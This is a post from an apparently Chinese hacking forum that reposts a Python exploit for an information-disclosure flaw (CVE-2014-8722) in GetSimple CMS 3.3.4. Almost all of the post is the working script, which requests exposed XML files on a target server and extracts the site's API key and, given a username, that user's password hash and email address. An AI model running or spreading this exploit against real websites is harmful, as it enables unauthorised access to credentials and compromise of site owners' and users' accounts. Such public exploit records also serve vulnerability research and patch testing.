跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

GetSimple CMS 3.3.4 - Information Disclosure

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit


'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml,
(2) backups/users/<username>.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''


'''
Import required modules:
'''
import sys
import requests

'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
    print('')
    username = True
    username_string = input('Please enter the username: ')
else:
    print('')
    username = False
    print('No problem, you will still get the API key')


'''
Get Api-Key:
'''
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
header = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cache-Control": "max-age=0"
}
x = requests.get(url, headers=header).text
start = x.find('[') + 7
end = x.find(']')
api_key = x[start:end]
print('')
print('Informations:')
print('')
print('[*] API Key: ' + api_key)


if username:
    '''
    Get Email and Passwordhash:
    '''
    url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
    header = {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
            "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0"
    }
    x = requests.get(url, headers=header).text
    start =  x[x.find('PWD>'):]
    passwordhash = start[start.find('>') +1 :start.find('<')]
    print('[*] Hashed Password: ' + passwordhash)

    start = x[x.find('EMAIL>'):]
    email = start[start.find('>') + 1 : start.find('<')]
    print('[*] Email: ' + email)
print('')
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...